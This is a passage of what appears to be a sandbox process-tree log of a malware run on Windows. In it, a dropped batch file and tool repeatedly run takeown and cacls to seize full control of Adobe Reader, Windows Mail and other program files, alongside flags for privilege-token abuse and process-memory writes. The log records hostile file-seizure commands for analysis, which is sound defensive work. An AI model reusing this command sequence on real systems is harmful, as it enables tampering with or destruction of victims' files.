  2⤵
  PID:3064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:4548
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:4184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:1792
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:3472
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:3728
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:1660
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:988
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:3904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:1868
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "pdf.gif" -nobanner
      4⤵
      PID:1648
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    PID:952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:2632
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:1112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:1960
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
      4⤵
      PID:3024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:3388
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:1348
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:2932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:4068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:3208
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:3664
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:4608
    - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
        
        3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
        5⤵
        
        PID:2564
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner
        5⤵
        
        PID:2872
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui"
        5⤵
        Modifies file permissions
        
        PID:4012
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui" /E /G Admin:F /C
        5⤵
        
        PID:1780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:2612
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
      4⤵
      PID:1968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:3220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:4472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui""
  2⤵
  PID:4672
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui""
  2⤵
  PID:4692
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:4740
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui"
      4⤵
      PID:4708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui""
  2⤵
  PID:4236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:3436
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3860
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "license.html" -nobanner
      4⤵
      PID:3536
    - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
        
        3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
        5⤵
        
        PID:3860
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
        5⤵
        
        PID:5060
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
        5⤵
        
        PID:5040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui"
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:4072
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3984
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "ChessMCE.png" -nobanner
      4⤵
      PID:2928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:3912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    PID:2848
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "eng32.clx" -nobanner
      4⤵
      PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:3960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:3048
    - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
        
        3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
        5⤵
        
        PID:3912
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ROMANIAN.TXT" -nobanner
        5⤵
        
        PID:2956
    - - C:\Windows\SysWOW64\takeown.exe
        
        takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
        5⤵
        
        PID:2624
    - - C:\Windows\SysWOW64\cacls.exe
        
        cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
        5⤵
        
        PID:4072
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
      4⤵
      PID:3932
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
      4⤵
      PID:4020
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula "ROMANIAN.TXT" -nobanner
      4⤵
      PID:4004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:4576
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:3708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:2536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:2012
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3788
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:3592
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"
      4⤵
      PID:2728
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:4328
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "blank.jtp" -nobanner
    3⤵
    PID:2580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4616
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:4644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:4048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:4636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:4264
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "main.css" -nobanner
    3⤵
    PID:4400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:4156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:4896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:4516
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:4132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:3652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:3956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:3528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  PID:4016
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  - Loads dropped DLL
  PID:1844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:4552
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:3800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:4592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  PID:2720
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    - Modifies file permissions
    PID:4564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:2536
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:3388
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:2724
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:596
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:2364
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
      4⤵
      PID:2544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:3040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:3052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:3904
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    PID:2488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  PID:2292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  PID:2404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:4968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:5052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:4596
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""
  2⤵
  PID:4452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""
  2⤵
  PID:4412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui""
  2⤵
  PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""
  2⤵
  PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui""
  2⤵
  PID:3444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:2132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  2⤵
  PID:3512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui""
  2⤵
  PID:848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:3336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:4184
- C:\Windows\SysWOW64\cmd.exe
